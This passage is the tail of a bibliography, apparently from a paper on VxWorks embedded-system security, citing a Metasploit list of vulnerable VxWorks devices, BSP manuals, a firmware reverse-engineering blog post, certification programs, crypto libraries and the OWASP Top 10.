[11] Rapid7, List of Vulnerable Devices - VxWorks, http://www.metasploit.com/data/confs/bsideslv2010/VxWorksDevices.xls
[12] RFC 3513, http://www.ietf.org/rfc/rfc3513.txt
[13] DD-WRT, http://www.dd-wrt.com/site/index
[14] L. Sha, R. Rajkumar, and J. P. Lehoczky, Priority Inheritance Protocols: An Approach to Real-Time Synchronization, IEEE Transactions on Computers, vol. 39, pp. 1175-1185, Sep. 1990.
[15] LEON VxWorks 6.5 BSP Manual, http://www.gaisler.com/doc/vxworks-bsps-6.5-1.1.2.0.pdf
[16] VxWorks Boot Sequence Program (BSP) Manipulation Utility, http://www.bitsum.com/files/bsptool.zip
[17] OpenSSL, http://www.openssl.org
[18] Wei-Tek Tsai, VxWorks and Tornado, http://asusrl.eas.asu.edu/cse494/content/realtime/Vxworks&Tornado.pdf
[19] Achilles Industry Certification Program, http://www.wurldtech.com/cyber-security/achilles-certification.aspx
[20] Blog, Wind River Introduces World's First Wurldtech Achilles Certified Real-Time Operating System, http://www.windriver.com/news/press/pr.html?ID=8381
[21] Cryptlib, http://www.cryptlib.com/downloads/manual.pdf
[22] Firefly, http://www.windriver.com/alliances/newdirectory/product.html?ID=1222
[23] Reverse Engineering VxWorks Firmware: WRT54Gv8, http://www.devttys0.com/2011/07/reverse-engineering-vxworks-firmware-wrt54gv8/
[24] OWASP Top 10, https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project